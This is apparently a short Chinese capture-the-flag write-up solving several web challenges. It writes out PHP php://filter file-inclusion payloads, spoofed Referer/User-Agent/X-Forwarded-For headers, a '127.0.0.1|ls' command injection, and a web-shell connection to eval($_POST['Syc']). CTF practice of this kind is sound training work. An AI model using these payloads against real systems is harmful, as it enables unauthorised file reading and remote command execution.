把一切都放在那里了,看到奇怪的背景颜色想到可能会在背景隐藏东西试一下Ctrl+A,果然
点击后跳转界面
我们可以找到但当我们访问action,php时,会直接跳转到end.php,抓包后可得到
访问可得
利用文件包含漏洞(PHP伪协议)
?file=php://filter/read=convert.base64-encode/resource=flag.php
解码后即可得到flag
点开后发现URL中存在文件包含,题目名字也很直接
我们利用php://filter伪协议进行文件包含
?file=php://filter/read/convert.base64-encode/resource=index.php
?file=php://filter/read/convert.base64-encode/resource=flag.php
即可得到flag
查看源码找到访问发现
在http头里添加referer: https://www.Sycsecret.com
修改ua为Syclover添加X-Forwarded-for: 127.0.0.1
即可得到flag{4e871159-20f7-45b8-8212-0eba92f7aa5c}
读源代码发现输入127.0.0.1|ls发现啥也没过滤
直接cat flag
进来后发现很直接暗示我们用菜刀并且告诉了我们密码 eval($_POST[“Syc”]); 打开菜刀直接连接shell即可得到flag